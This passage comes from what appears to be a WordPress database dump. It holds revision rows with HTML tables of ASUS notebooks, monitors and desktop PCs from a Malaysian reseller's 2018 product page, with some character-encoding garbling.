i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-20 17:06:20','2018-12-20 09:06:20','',1442,'https://bintara.com.my/blog/2018/12/20/1442-revision-v1/',0,'revision','',0),(2623,1,'2018-12-20 11:04:38','2018-12-20 03:04:38','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>DESKTOP</h2>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2018-12-20 11:04:38','2018-12-20 03:04:38','',1442,'https://bintara.com.my/blog/2018/12/20/1442-revision-v1/',0,'revision','',0),(2590,1,'2018-12-19 17:31:05','2018-12-19 09:31:05','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n<img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"171\" height=\"171\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"178\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>DESKTOP</h2>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" 